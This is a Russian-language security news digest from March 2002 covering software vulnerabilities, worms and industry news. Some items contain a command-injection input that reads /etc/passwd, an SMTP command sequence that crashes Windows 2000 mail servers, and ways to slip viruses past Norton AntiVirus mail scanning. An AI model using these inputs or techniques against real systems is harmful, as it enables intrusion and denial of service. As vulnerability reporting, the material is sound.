PHP Net Toolpack - это php-интерфейс для запуска через WWW-сервер программ finger, traceroute и whois. Авторы забыли в коде указать полный путь к программам и не проверяют входную строку параметров для этих программ. Таким образом существует возможность запуска критичных программ, либо запуска руткит, предварительно сохранённого в текущей директории под именем настоящей программы (traceroute, finger, whois). Как пример, можно привести пример запроса такого вида-"www.example.com; cat /etc/passwd", который покажет содержимое файла паролей. Подробности - http://www.ppp-design.de/advisories_show.php?adv=php_net_toolpack__input_validation_error.txt
19/03/2002 Уязвимость в Eudora for Windows.
Обнаружена уязвимость в почтовой программе Eudora для ОС Windows. Eudora автоматически декодирует прикреплённые к почте файлы и сохраняет их в отдельной директории, расположение которой различно для различных версий Eudora. В приведённой ниже ссылке запускается калькулятор, но эксплоит может быть переделан для выполнения автодекодирования прикреплённого файла. Эта уязвимость может быть использована 2 путями. Первый-послать в письме прикреплённый файл и ссылку на сервер, который бы содержал "неправильный" файл-image. Второй путь-если Eudora содержит внедрённый IE для разбирания HTML-почты, можно заставить эксплоит запуститься при обработке HTML-запроса. Ссылка на пример - http://x42.com/test/calc.jpg
19/03/2002 Microsoft Loses Courtroom Battle Over Windows Trademark.
Суд состоявшийся 18 Марта не оправдал обвинения Microsoft в адрес компании Lindows по поводу использования торговой марки Windows, чтобы якобы запутать, ввести в заблуждение клиентов, которые будут думать, что операционная система Lindows - продукт корпорации Microsoft. Более того, судья сообщил, что легальность торговой марки Windows вообще ставится под большой вопрос. Полное решение суда и главные вырезки из него можно прочитать здесь: http://www.net2.com/lindows/
18/03/2002 "Баг" в QPopper POP3-сервере.
В популярном POP3-сервере QPopper обнаружен "баг". При соединении с сервером и посылке ему строки длиной больше 2048 символов (из сообщения не совсем понятно куда эта строка должна быть послана-в поле пароля или имени пользователя), демон, обслуживающий POP3-запросы (in.popper или popper), загружает на 100 % процессор. Для устранения этой ситуации требуется вручную убить демон. Данный баг может быть использован для удалённого DoS системы. Судя по всему, ошибка содержится в файле popper/popper.c или файла. Были проверены версии 4.0.1-4.0.3 на операционных системах (дистрибутивах) - RedHat 7.1, RedHat 7.2, FreeBSD 4.4, Debian 2.2, Debian 3.0, Solaris 7, SuSE 7.3. Патч прилагается. Описание - http://www.digitux.net/security/advisories.html?id=34&display=info Патч - http://www.digitux.net/qpopper.patch
18/03/2002 AOL секретно выпускает альфа-версию ICQ 2002a, но она становится доступной всем.
Разработка новой версии популярного интернет-пейджера ICQ, по замыслу компании AOL, не должна стать достоянием общественности, однако удержать новую версию ICQ 2002a в стенах компании так и не удалось. В сети появился промежуточный релиз (альфа-версия!) ICQ 2002a Build 3706. На сайте IExBeta была выложена новая версия интернет-пейджера, но позже по неизвестным причинам (скорее всего из-за того, что спрос на "аську" явно превышал возможности серверов) её убрали. Источник - http://www.compulenta.ru/news/2002/3/15/26829
16/03/2002 У команды uinC появился свой ftp сервер..
Мы наконец-то открыли свой ftp сервер на котором мы собрали самые лучшие, уникальные и редкие инструменты по взлому и безопасности для windows и unix платформ, а также документацию. Наш сервер отличается от других похожих отличной организацией файлов и возможностью закачать свои файлы в папку incoming, после чего мы сможешм разместить их в общем архиве. Все инструменты и документация разделены по темам, к каждому инструменту прилагается краткое описание. Из главных разделов инструментов можно выделить: Analyze and scan, Data_recovery, Dictionary_creation, Encryption, Forensics, Intrusion detection, Password crackers, R00tkit detection, R00tkits, Routers, Secure Connection, Sniffers, Spoofing and packet crafting, Spy, Steganography, Switched environment sniffers and interceptors, System monitoring, Trojans, Wireless. Наш ftp сервер находится по адресу: ftp.uinc.ru/uinc/
15/03/2002 Microsoft (tm) открывает реализцию фирменного протокола SMB.
Jim Desler сообщил, что в рамках выполнения требовний судебного соглашения Microsoft открывает реализацию фирменного протокола SMB и код Common Internet File System (CIFS). Подробности - http://www.eweek.com/article/0,3658,s=1884&a=23968,00.asp
15/03/2002 Судья принял первое решение по делу о патенте British Telecom на технологию гиперссылок.
Появились первые судебные решения по делу British Telecom против интернет-провайдера Prodigy Communications. Судебный процесс можно назвать очень важным и значимым, поскольку фактически это попытка British Telecom доказать, что она владеет правами на саму технологию гиперссылок (hyperlinks), на которых держится весь интернет. Судья Колин Макмэон, рассматривающая это дело, выдала тридцативосьмистраничное решение, которое, однако, особой внятности в вопрос не внесло. Судья смогла сказать определенно лишь то, что из американского патента British Telecom напрямую не следует, будто этой корпорации и в самом деле принадлежит техническая идея гиперссылок в Сети. Подробности: Compulenta.ru Источник: NewsBytes
15/03/2002 Множественные уязвимости в ORACLE серверах.
CERT выпустил информационный бюллетень, в котором указывается на множественные уязвимости в ORACLE-серверах. Эти уязвимости включают: возможность переполнения буффера; установки по умолчанию, не обеспечивающие достаточный уровень безопасности (insecure default settings); ошибки аутентификации, способные вызвать нарушение доступа (failures to enforce access controls); ошибки в разборе входных данных (failure to validate input). Используя эти уязвимости злоумышленник может получить возможность-запустить свой код на сервере; выполнить атаку типа DoS, выполнить на сервере команды от имени пользователя, запустившего сервис (в UNIX-oracle, в Windows-системах-пользователь SYSTEM); получить неавторизованный доступ к важной системной информации. Уязвимость связана с наличием при установке Oracle Application Server Вэб-сервера. Этот Вэб-сервер дополнен компонентами, обеспечивающими связь с приложениями баз данных. К ним относятся- модуль Procedural Language/Structured Query Language (PL/SQL), Jave Server Pages, XSQL-cервлеты, приложения Simple Object Access Protocol (SOAP). Основная масса уязвимостей связана с модулем PL/SQL. Oracle выпустила патчи и рекомендации для устранения этих "дыр" и рекомендует всем их применить. Уязвимости подвержены - Oracle8i Database, Oracle9i Database, Oracle9i Application Server. Информационный бюллетень CERT - http://www.cert.org/advisories/CA-2002-08.html
15/03/2002 CeBIT. Системы безопасности.
Фирма Panasonic представила новую систему идентификации по глазу человека. Система делает фотографию глаза пользователя и заносит результаты в банк данных, из которого, в последствии, они будут забираться для сравнения. Представители компании утверждают, что для идентификации достаточно всего трех секунд. Одна из таких систем уже установлена в аэропорте Хиатроу (Heathrow) в Лондоне. Предполагается, что данная система по надежности не уступает проверке отпечатков пальцев. Источник: CNN.com
15/03/2002 Новый способ перехвата информации.
Joe Loughry и David A. Umphress опубликовали результаты исследований по перехвату информации по миганию светодиода устройства. Результаты заставляют задуматься - снимать информацию с модема на скорости 9600 удается с расстояния 20 метров. Теоретический порог скорости для даного метода перехвата заявлен в 10Mbps. Источник - http://bugtraq.ru/rsn/archive/2002/03/22.html Ссылка по теме (PDF-документ) - http://applied-math.org/optical_tempest.pdf
15/03/2002 Cтатья "Уязвимости алгоритма и семейства протоколов Spaning Tree".
Олег Артемьев и Владислав Мяснянкин подготовили статью об уязвимости алгоритма Spaning Tree и семейства протоколов Spaning Tree. Приводим краткое вступление. "Алгоритм Spaning Tree и семейство протоколов Spaning Tree, поддерживаемые большинством произодителей интеллектуального сетевого оборудования имеют ряд серьезных уязвимостей (security vulnerabilities). Обзор этих уязвимостей был напечатан в Российском журнале "LAN" (LAN, #1 2002, дополнительная информация о журнале может быть получена c http://www.osp.ru/lan/about/ ). Согласно нашей договоренности с редакцией мы можем свободно публиковать полное исследование по истечении двух месяцев с момента публикации бумажного издания. Поскольку материалы исследования были сделаны на русском языке, сначала будет доступна русскоязычная версия проекта и лишь потом англоязычная." Ссылка на статью - http://olli.digger.org.ru/STP/announce-ru.html
14/03/2002 Статья по оптимизации пересылки данных по сети в Linux.
Вышла первая из серии статей по оптимальной передаче данных по сети TCP/IP на сайте Builder.com. В написании участвовал автор реализации Linux TCP stack Алексей Кузнецов. Статьи рассмотрят использование примитива sendfile() и опций TCP_CORK, TCP_DEFERACCEPT и TCP_QUICKACK для правильной организации разного типа client/server соединений. Статья доступна здесь: http://builder.com.com/article.jhtml;jsessionid=LDLUCBNGOEKDIQD23WQCFFI?id=u00220020315gcn01.htm
14/03/2002 У нас новая программа: Program Hunter v1.0.
Программа для админов - борцов с разными там пасьянсами на рабочем месте. Исходники прилагаются. Скачать программу: http://www.uinc.ru/scripts/load.cgi?files/jcukeng/PHunter.zip
14/03/2002 Обновления портов для FreeBSD.
12 марта FreeBSD Inc. выпустила обновление портов многих своих продуктов. В основном обновления были связаны с проблемами безопасности в этих пакетах. FreeBSD Inc. рекомендует всем администраторам/пользователям этих пакетов обновить их на более новые версии. К числу этих пакетов относятся: pam-pgsql, cyrus-sasl, netscape, mod_frontpage. Что касается netscape, уязвимость в нём выражается в неправильной интерпретации поля комментариев в GIF89a и JPEG, позволяющему злоумышленнику поставить вместо комментария Java-скрипт. Этой уязвимости подвержен netscape версии до 4.77. Для автоматизации процесса обновления портов рекомендуется применять утилиту portcheckout. Ссылка на коллекцию портов - http://www.freebsd.org/ports/ Утилита portcheckout доступна /usr/ports/devel/portcheckout либо здесь -ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-4-stable/Latest/portcheckout.tgz
14/03/2002 CERT выпустил документ с описанием уязвимости в библиотеке сжатия zlib.
12 марта CERT выпустил документ, детально описывающий уязвимость в библиотеке сжатия zlib, которая применяется во многих ОС многими программами (мы сообщали об этой уязвимости ранее). Уязвимость связана с ошибкой в коде этой библиотеке из-за которой происходит "двойное" освобождение памяти при декомпрессии сжатых данных. Полное название этой уязвимости - "Double Free Bug in zlib Compression Library", имеет код в архиве уязвимостей CA-2002-07. В зависимости от того, как и где вызывается уязвимая информация, результат атаки может быть-DoS, утечка важной системной информации или выполнение "враждебного" кода в памяти. Как указывает CERT, пока заявлений об использовании этой уязвимости не поступало. Всем администраторам/пользователям *nix-систем рекомендуют пропатчить свои системы. В зависимости от того, как программа взаимодействует с этой библиотекой (динамически или статически слинкована zlib) необходимо пропапгрейдить библиотеку и сами программы. Основная часть производителей ОС выпустили патчи. Создатели zlib (www.zlib.org) выпустили очередной релиз -1.1.4 своего продукта. Подробное описание - http://www.cert.org/advisories/CA-2002-07.html Cписок всех программ, использующих zlib - http://www.gzip.org/zlib/apps.html Cкрипт на Перле для нахождения программ со статически слинкованной zlib - http://cert.uni-stuttgart.de/files/fw/find-zlib
14/03/2002 Множественные уязвимости в SQL-серверах 7 и 2000.
Как указывает в BUGTRAQ Cesar Cerrudo найдены уязвимости в модулях SQL-серверов версий 7 и 2000, которые могут привести к переполнению буффера при выполнению удалённых атак. К этим процедурам относятся следующие (extended stored procedured) - SQL Server 7: xp_repl_encrypt, xp_oledbinfo, xp_dsninfo. SQL Server 2000: xp_mergelineages, xp_controlqueueservice, xp_createprivatequeue, xp_createqueue, xp_decodequeuecmd, xp_deleteprivatequeue, xp_deletequeue, xp_displayqueuemesgs, xp_oledbinfo, xp_readpkfromqueue, xp_readpkfromvarbin, xp_repl_encrypt, xp_resetqueue, xp_unpackcab. Автор рекомендует запретить (не использовать) extended stored procedures и их DLL. Подробное описание и результаты тестов - http://www.appsecinc.com/resources/alerts/mssql/02-0000.html
14/03/2002 Уязвимость в SMStools в версии до 1.4.8.
Пакет SMStools от Stefan Frings имееет уязвимость формата строки, которая позволяет выполнить на сервере с установленным smsd произвольный код от имени пользователя, запустившего демон smsd. Рекомендуется проапгрейдить версию SMStools на релиз 1.4.8. Ccылка - http://www.isis.de/members/~s.frings/smstools/
13/03/2002 Многие новостные сайты имеют уязвимость HTML-кода.
Как указывает в BUGTRAQ Point Blank Security и автор - Jeremiah Jacks, многие новостные сайты имеют уязвимость, которая позволяет получать критическую информацию, используя внедрённые HTML-тега, формируемые Web-броузерами. В качестве примеров приводятся - LA Tymes, NY Times, Newsbytes, The Washington Post. Автор даёт ссылку на полный список подобных сайтов. Примечательно, что описание подобной уязвимости было объявлено CERT 2 февраля 2002 г. и в оригинале звучит так: "A web site may inadvertently include malicious HTML tags or script in a dynamically generated page based on unvalidated input from untrustworthy sources. This can be a problem when a web server does not adequately ensure that generated pages are properly encoded to prevent unintended execution of scripts, and when input is not validated to prevent malicious HTML from being presented to the user." Список уязвимых сайтов c примерами - http://www.pointblanksecurity.com/css/ Ссылка на описание уязвимости - http://www.cert.org/advisories/CA-2000-02.html
13/03/2002 Описание уязвимости в SMTP-сервере Win2K.
27 февраля Micrisoft выпустила патч, который предотвращает DoS в SMTP-компоненте ОС Win2K. Этот баг существует во всех Win2K, на которых не установлен хотфикс MS02-012. Так как Exchange также использует SMTP при работе в Win2K, он также подвержен этой уязвимости. При применении атаки, основанной на этой уязвимости "сваливаются все сервисы, которые запущены через inetinfo.exe. К ним относятся-IIS, FTP, Gopher и т.д. 12 февраля Microsoft выпустила патч SP2SR1, однако он не устранил уязвимость и всем настоятельно рекомендуется применить новый хотфикс MS02-12. Уязвимость связана с некорректной обработкой SMTP команды BDAT. Поместив команду AUTH LOGIN после ввода BDAT N (N-количество байт), и нажав несколько раз "Ввод" можно свалить сервер. Пример сессии (CR-это перевод строки, он же Carriage Return): BDAT 1 CR XAUTH LOGIN CR (output from auth login) CR CR Выпущен исходник эксплоита на Перле. Исходный текст эксплоита- http://www.digitaloffense.net/mssmtp/mssmtp_dos.pl Патч от Microsoft - http://www.microsoft.com/technet/security/bulletin/MS02-012.asp
13/03/2002 Скрипт для проверки узвимости библиотеки zlib.
В BUGTRAQ вышел скрипт для проверки SUID-бинарников на уязвимость zlib. Название - zlibscan. Ссылка - http://www.securityfocus.com
13/03/2002 Приносим извинения...
Команда UInC признает свою оплошность, имевшую место при публикации ряда материалов в разделе новостей, взятых с сервера www.bezpeka.com, без согласования с администраций данного ресурса, в связи с чем приносим свои искренние извинения. UInC Team
13/03/2002 Ложная рассылка от имени Microsoft.
В списке рассылки BUGTRAQ появились сообщения о ложной рассылке от имени Майкрософт патча для IE и Outlook Express(указывается дыра "Incorrect MIME Header Can Cause IE to Execute E-mail Attachment"). Но в самом письме приведена не ссылка, а вложенный .exe-файл. Как утверждают специалисты-это результат рассылки от машин, заражённых вирусом W32/Gibe@MM, который является троянцем. Ссылка на информацию о вирусе - http://www.symantec.com/avcenter/venc/data/w32.gibe@mm.html
13/03/2002 Интересная статья по сигнатурам атак на порт 80.
Zenomorph (admin@cgisecurity.com) опубликовал вторую часть своего обзора сигнатур атак на порт 80 (вэб-серверы и вэб-приложения). Порт 80 - это стандартный порт для веб-сайтов, и он может иметь множество различных вопросов безопасности. Эти дыры могут позволить атакующему получить какой-либо административный доступ к веб-сайту, или даже к самому веб-серверу. В этом документе рассматриваются некоторые сигнатуры, используемые в этих атаках, и что нужно искать в ваших логах. На сервере есть также перевод на русский язык. Приведён также пример шестнадцатиричного кодирования запросов. Вторая часть обзора - http://www.cgisecurity.net/papers/fingerprinting-2.html Русский перевод - http://www.cgisecurity.net/papers/russian-fingerprints.html Общая страница - http://www.cgisecurity.net/papers/
12/03/2002 Новый деструктивный червь I-Worm.MyLife.
Разработчик антивирусного ПО, компания "Лаборатория Касперского", сообщает о появлении нового червя - I-Worm.MyLife. Распространяется MyLife в виде файлов, прикрепленных к зараженным письмам; активизируется - только если пользователь сам запускает вложение. Затем червь инсталлирует себя в систему и запускает процедуру своего распространения. Деструктивная процедура червя заключается в удалении файлов с расширениями .SYS и .COM в корневой директории диска C:, файлов с расширениями .COM, .SYS, .INI, .EXE в каталоге Windows, а также файлов с расширениями .SYS, .VXD, .EXE, .DLL в системном каталоге Windows. Источник - http://www.bezpeka.com
12/03/2002 Уязвимость в популярной библиотеке компрессии zlib.
В алгоритме декомпрессии, используемом популярной библиотекой компрессии zlib, обнаружена ошибка, которая делает уязимым любое ПО, использующее библиотеку zlib версий 1.1.3 и ниже. Уязвимость позволяет исполнять произвольный код с правами программы, использующей zlib. В настоящее время доступна версия zlib 1.1.4, не подверженная данной уязвимости. Ряд производителей Linux уже выпустил бюллетени и патчи, касающиеся данной проблемы. Источник - http://www.bezpeka.com Подробное описание уязвимости - http://www.gzip.org/zlib/advisory-2002-03-11.txt
12/03/2002 Уязвимости Symantec Norton AntiVirus 2002 позволяют обходить защиту электронной почты.
Недавно Edvice Security провела комплексную проверку Norton AntiVirus 2002 на способность обнаруживать вирусы в поступающих почтовых сообщениях. NAV 2002 включает особенность защиты электронных сообщений, которая просматривает входящие и исходящие электронные письма на наличие вирусов. В результате проверки найдено 4 уязвимости (одна из них затрагивает механизм автоматической защиты), позволяющих обходить систему защиты электронной почты в NAV 2002. Во-первых, можно обойти систему защиты электронной почты в NAV 2002, вводя нулевой символ в MIME сообщение. Если NULL символ появляется перед вирусной частью, то NAV 2002 не в состоянии обнаружить вирус. Во-вторых, в некоторых не-RFC MIME форматах электронных сообщений NAV 2002 не способен произвести полное сканирование письма на наличие вируса или опасного кода. В-третьих, два типа файлов .nch и .dbx, исключены по умолчанию из просмотра Norton AntiVirus 2002. Атакующий может использовать Word макро вирус, переименовывать его к расширению .nch или .dbx, и посылать жертве. И, в-четвертых, путем задания различных имен файлов в полях Content-type и Content-disposition, вложенный файл будет исключен из просмотра в Norton AntiVirus 2002. Oulook определяет имя файла, используя имя в поле Content-disposition, в то время как Norton AntiVirus 2002 будет просматривать имя в поле Content-Type. Подробности - http://www.bezpeka.com
12/03/2002 Network Associates сворачивает технологию PGP.
Корпорация Network Associates объявила о том, что с 1 марта 2002 г. прекращены продажи программных продуктов, обеспечивающих PGP-шифрование. Около года назад Network Associates объявила об ограничениях, наложенных на свободное распространение клиентских программ PGP, и начала коммерческие продажи последних в двух модификациях: корпоративной и пользовательской. Однако, как сообщила представитель корпорации Дженнифер Кивни (Jennifer Keavney), данная мера не вызвала роста прибыли компании, и по этой причине распространение технологии было прекращено. В то же время, Network Associates намерена осуществлять поддержку своих корпоративных клиентов до истечения срока действия их лицензионных соглашений. Наиболее пострадавшей стороной в результате данного решения стал сам Фил Циммерман, который практически стал свидетелем сворачивания собственного проекта, на развитие которого он больше не имеет прав. В настоящее время г-н Циммерман предпринимает отчаянные попытки спасти свое изобретение, призывая Network Associates предоставить открытый код PGP-клиента другим разработчикам. "PGP - это явление, которое само по себе больше, чем отдельная компания, отдельная технология или отдельный программный продукт", - заявил изобретатель в интервью сетевому изданию The Register. Источник - http://www.bezpeka.com
12/03/2002 Корпоративные сети оказались беззащитны перед банками из-под чипсов.
Компания i-sec, которая занимается проблемами информационной безопасности, продемонстрировала ВВС, как при помощи направленной антенны, сделанной из банки из-под чипсов Pringles можно с улицы проникнуть в беспроводную внутреннюю корпоративную сеть. Во время демонстрационного эксперимента за 30 минут представитель компании из автомобиля "вскрыл" 60 сетей различных финансовых фирм в центре Лондона. По словам представителя i-sec, около двух третей всех фирм, использующих беспроводные сети, не заботятся об их безопасности. По данным компании, 67 процентов фирм даже не включают систему шифрования после установки сетевого оборудования. Хотелось бы прокомментировать данную новость. Во-первых: То, что показала эта компания - не ново и уже используется хакерами, именно в Лондоне, уже в течении достаточно долгого времени(более полугода). Более того, те, у кого нет машин, ездят и сканируют(ищут) сети на велосипедах. На данный момент существует немало ресурсов посвященных безопаности и взлому беспрповодных сетей, ссылки на такие ресурсы можно найти в большом количестве на http://www.wardriving.com. Во-вторых: Та банка из под Pringles, о которой говорится в новости, спокойно могла оказаться и обычной консервной банкой; и то и другое успешно используется хакерами для изготовления примитивной антенны, которая способна улавливать сигналы из близлежащих беспроводных локальных сетей. Подробные инструкции по изготовлению таких антенн можно найти здесь: http://www.turnpoint.net/wireless/has.html В-третьих: На данный момент было выпущено немало программ для сканирования и взлома таких беспроводных сетей. Большинство из них написано под Линукс, что значительно облегчает работу, так как взламывать системы гораздо удобнее под Линукс платформой. Посмотреть и скачать некоторые из этих программ можно здесь: ftp://ftp.uinc.ru/uinc/unix/wireless/ Ссылка на оригинальную новость: http://www.lenta.ru/internet/2002/03/11/pringles/
12/03/2002 Слабые стороны механизма аутентификации Kerberos в Windows 2000.
Хорошо известно, что механизмы аутентификации LM и NTLM, используемые в NT4 (а также, для обратной совместимости, в Windows 2000), подвержены атакам на оффлайновый подбор паролей. Однако, вопрос о том, возможно ли адаптировать подобные технологии восстановления паролей для схемы аутентификации Kerberos 5 под Windows 2000, остается мало изученным. Для того чтобы восполнить данный пробел, компания Rainbow Diamond Limited опубликовала на своем сайте исследование под названием "Feasibility of attacking Windows 2000 Kerberos Passwords" (Возможность взлома Kerberos паролей в Windows 2000). Его автор, Фрэнк О'Двайер (Frank O'Dwyer), рассматривает слабые стороны данного механизма аутентификации и принципы создания "l0phtcrack"-подобной программы для восстановления паролей Kerberos 5. Текст статьи - http://www.bezpeka.com
12/03/2002 Несанкционированное изменение паролей в Windows NT через сервер IIS.
В политике безопасности операционной системы Microsoft Windows NT Server 4.0 с установленным веб-сервером Microsoft IIS 4.0 обнаружена уязвимость, позволяющая изменять пароли пользователей, для которых изменение паролей запрещено администратором, через веб-ориентированные .HTR приложения. Изменить пароль можно также для отключенных учетных записей. Уязвимости подвержены системы Microsoft Windows NT Server 4.0 + IIS 4.0 + Service pack 6.0. Единственным решением, которое рекомендует сама Microsoft, является отказ от использования приложений, основанных на .HTR, и применение вместо этого технологии ADSI для работы с учетными записями через HTML страницы. Источник - http://www.bezpeka.com
11/03/2002 Переполнение буфера в оболочке Windows может привести к выполнению произвольного кода.
Компания Microsoft выпустила бюллетень по безопасности MS02-014, посвященный проблеме переполнения буфера в оболочке операционных систем Windows 98, Windows 98 Second Edition, Windows NT 4.0, Windows NT 4.0 Terminal Server Edition, Windows 2000. В одной из функций системной оболочки, которая позволяет обнаруживать некорректно деинсталлированные приложения, существует непроверяемый буфер, переполнение которого может привести к аварийному сбою в оболочке либо к выполнению произвольного кода в контексте текущего пользователя. По умолчанию, данная уязвимость не может быть использована извне. Однако, при особых обстоятельствах, атакующий может воспользоваться ею через специальным образом сформированную веб-страницу. Подробности - http://www.bezpeka.com
11/03/2002 Уязвимость в OpenSSH позволяет получить права root.
9 марта вышел бюллетень по безопасности Pine Internet, посвященный уязвимости продукта OpenSSH версий 2.0-3.0.2 под различные платформы. Пользователь, имеющий учетную запись в системе, может злоупотребить данной уязвимостью для получения прав root. Кроме того, злонамеренный SSH сервер может использовать ее для компрометации уязвимого SSH клиента. Источник - http://www.bezpeka.com
10/03/2002 Linux 2.5.6.
Продолжение "нестабильной" ветви ядра Linux. Довольно много исправлений в подсистеме usb, также подправлены драйвера alsa. Для smbfs добавлен unicode. Скачать - http://www.kernel.org/pub/linux/kernel/v2.5/ ChangeLog - http://www.kernel.org/pub/linux/kernel/v2.5/ChangeLog-2.5.6
10/03/2002 nVidia XFree86_40 Drivers.
И снова nVidia радует пользователей Linux новой порцией драйверов. На этот раз для карт на чипсетах TNT, TNT2, TNT2 Ultra, GeForce и Quadro. Скачать - http://www.nvidia.com/view.asp?PAGE=linux
9/03/2002 Множественное переполнение буфера в CFS.
В файловой системе Cryptographic File System (CFS) для ОС Linux и UNIX обнаружена множественная уязвимость переполнения буфера, в результате которой удаленный пользователь может вызвать крах CFS. Информации о том, существует ли возможность выполнять произвольный код на атакуемой системе с использованием данной уязвимости, пока нет. Источник - http://www.bezpeka.com
9/03/2002 Переполнение буфера в Web+ v5.0.
В среде разработки Web+ v5.0 компании Talentsoft, используемой для создания клиент-серверных приложений для web обнаружена уязвимость переполнения буфера. Проблема заключается в том, что при установке Web+, файл webplus.exe копируется в каталог cgi-bin или scripts и в дальнейшем используется разными продуктами TalentSoft, такими как Web+ Shop, Web+ Mall и Web+ Enterprise. Удаленный пользователь может передавать этим приложениям различные параметры, которые, в свою очередь, будут переданы сначала webplus.exe, а затем системному сервису webpsvc.exe. В случае передачи в качестве параметра строки, превышающей некоторую длину, в сервисе происходит переполнение буфера. А так как Webpsvc является системным сервисом, то данная уязвимость влечет за собой возможность удаленного выполнения злонамеренного кода с системными правами. Компания TalentSoft уже выпустила патч, решающий проблему, и рекомендует всем пользователям Web+ установить его. Подробности - http://www.net-security.org
9/03/2002 Новая версия системы защиты конфиденциальной информации StrongDisk Server 3.0.
Вышла новая версия программы StrongDisk Server 3.0. StrongDisk Server - это система для защиты конфиденциальной информации, хранимой на сервере и доступной одновременно многим пользователям. Новая версия StrongDisk Server 3.0 отличается возможностью дистанционного управления с любого удаленного компьютера для экстренного уничтожения информации, а также повышенной надежностью, которую гарантирует использование электронных ключей и дополнительных средств для предотвращения утечки информации. Источник - http://www.rainbow.msk.ru
9/03/2002 Новый опасный интернет-червь.
Разработчик антивирусного ПО, компания Sophos, сообщает об обнаружении нового интернет-червя W32/Gibe-A, выдающего себя за письмо от Microsoft, содержащее патч для уязвимости в Internet Explorer и MS Outlook/Express (бюллетень MS02-005). При запуске вложения (q216309.exe), червь копирует себя и файл vtnmsccd.dll в системный каталог Windows. Затем он создает файл 02_n803.dat, содержащий информацию о e-mail адресах получателей, и посредством bctool.exe и winnetw.exe рассылает свои копии. Червь также запускает в фоновом режиме файл gfxacc.exe и открывает порт 12387, позволяя удаленному пользователю получить контроль над компьютером. Подробности - http://www.sophos.com
9/03/2002 Очередное переполнение буфера в Microsoft SQL Server.
В функции xp_dirtree Microsoft SQL Server обнаружена уязвимость переполнения буфера. Данная функция позволяет пользователям получать информацию о структуре каталогов указанного диска или каталога. Передав функции xp_dirtree слишком длинный параметр, удаленный пользователь может вызвать переполнение буфера, и как следствие, сбой в работе сервера. Источник - http://www.securitytracker.com
8/03/2002 Антивирусные эксперты предупреждают об опасности эпидемии "неуловимого" вируса ZombieMist.
На этой неделе в почтовой рассылке Focus Virus появилось несколько сообщений о заражении компьютеров вирусом ZombieMist, который впервые появился около года назад. Эксперты в области антивирусных технологий считают ZombieMist самым совершенным и сложным для обнаружения вирусом. Дело в том, что для маскировки вирус использует совершенно новый прием, названный "интеграцией в код". В компании Symantec установили, что вирус умеет декомпилировать исполняемые файлы и внедрять в них свой код, захватывая с этой целью до 32 Мб ОЗУ. В результате, можно сказать, что пораженный файл сам становится вирусом, при этом зараженная программа продолжает нормально работать. Таким образом, обнаружить вирус путем эвристического анализа файлов становится весьма сложно, к тому же, для дополнительной маскировки в ZombieMist используются элементы полиморфизма. Источник - http://www.vnunet.com/
8/03/2002 В интернете обнаружен и обезврежен онлайновый генератор макровирусов.
Британский сайт Vnunet еще в понедельник сообщил о появлении в интернете "первого и единственного" онлайнового генератора вирусов Macro Virus Maker v1.2. С его помощью любой желающий, даже не подозревающий о существовании языков программирования, мог создать собственный макровирус для Microsoft Word. Для этого нужно было указать название вируса, текст сообщения, который тот выводил бы на экран, и день активации. После этого специальный скрипт генерировал страницу, содержащую текст макроса. Затем макрос можно было поместить в любой документ Word и отправить по электронной почте недругам. Источник - http://www.compulenta.ru/news/2002/3/7/26456/
8/03/2002 Klez.e почти ничего не сделал, зато другой вирус постарался на славу.
В то время, как вирусу Klez.e 6 марта так и не удалось нанести сколько-нибудь ощутимого вреда, другой вирус - оставшийся, кстати, безвестным - причинил немало беспокойства сотрудникам американской брокерской фирмы UBS PaineWebber. Как сообщается, вирус нанес удар по большому количеству личных компьютеров брокеров, работающих на фирму, однако большая часть сотрудников фирмы имеет доступ к данным через центральные компьютеры. Их вирус на затронул. Что касается двух миллионов клиентов фирмы, так они и вовсе не ощутили никаких затруднений, сообщили в PaineWebber. Подробности - http://www.compulenta.ru/news/2002/3/7/26486
8/03/2002 В США примут закон о создании домена kids.
Группа экспертов конгресса США одобрила закон о детском интернет-домене kids, который, по замыслу, будет является зоной интернета, свободной от насилия, порнографии, азартных игр и другого вредного для детей контента. Первоначально предполагалось что детям выделят домен .kids первого уровня, такой как .com, .org, .net, но затем было решено от этого отказаться, так как интернет-корпорация по предоставлению имен и адресов (the Internet Corporation For Assigned Names and Numbers ,ICANN), которая должна была бы ввести в действия этот домен, не подчиняется правительству США. Источник - http://www.compulenta.ru/news/2002/3/8/26500
7/03/2002 "Население Online" достигло 500`000`000 человек.
По данным CNN, на конец 2001-ого года уже более полумиллиарда человек по всему миру имело доступ к глобальной сети. Источник - http://slashdot.org/
7/03/2002 Руководство по портированию с Solaris на Linux.
IBM developerWorks опубликовала статью - руководство по портированию приложений на C/C++ с Solaris на Linux. В статье расмотрены различия в системных типах, библиотеках и окружении. Ccылка - http://www-1.ibm.com/servers/esdd/articles/porting_linux/index.html?t=gr,l=335,p=PortSolaris2Linux
7/03/2002 Cтатьи по переполнению буффера в Win и по удалённому определению конфигурации IIS-сервера.
David Litchfield в списке рассылки BUGTRAQ анонсировал две новых статьи по компьютерной безопасности. Первая описывает технологию переполнения буффера в Win, не основанную на стеке. Как указывает автор, в последнее время появилось много различных программ, предотвращающих выполнение программ переполнения буффера на стэк-ориентированных методах, поэтому больший интерес представляет технология, не основанные на стеке. Вторая статья описывает, как можно определить конфигурацию IIS-сервера на основе анализа ответов, получаемых от этого сервера. Доступны здесь - http://www.ngssoftware.com/research.html
6/03/2002 Исходный код программы для тестирования уязвимости RADIUS.
3APA3A (http://www.security.nnov.ru) опубликовал в BUGTRAQ исходник программы, использующей уязвимость RADIUS (мы о ней писали 2 дня назад - cм. также http://online.securityfocus.com/archive/1/239784). Программа (без переделки) не позволяет спуффить IP-адрес, поэтому для её успешного исполнения необходимо, чтобы IP-адрес запускаеющего должен быть зарегистрирован в NAS сервера RADIUS. Исходный код - http://www.security.nnov.ru/files/test_radius.c
6/03/2002 Опубликован исходный текст эксплоита уязвимости PHP в APACHE.
Gabriel A. Maggiotti из Аргентины опубликовал в BUGTRAQ исходный код эксплоита, который использует уязвимость, ранее обнаруженную в реализации PHP для APACHE. Как пишет сам автор, его программа не выполняет никаких вредоносных действий на сервере, а только рушит HTTP-демон (DoS). Ипользует уязвимость в Apache/1.3.x + php_4.0.6. Напомним, что уязвимость обнаружена в функции php_mime_split и при "неправильном" использовании POST fileuploads (он же multipart/form-data POST request-RFC1867) позволяет злоумышленнику запустить на сервере свой код. Исходник программы - http://qb0x.net/exploits/apache_php.c
6/03/2002 Штаты прижимают Microsoft.
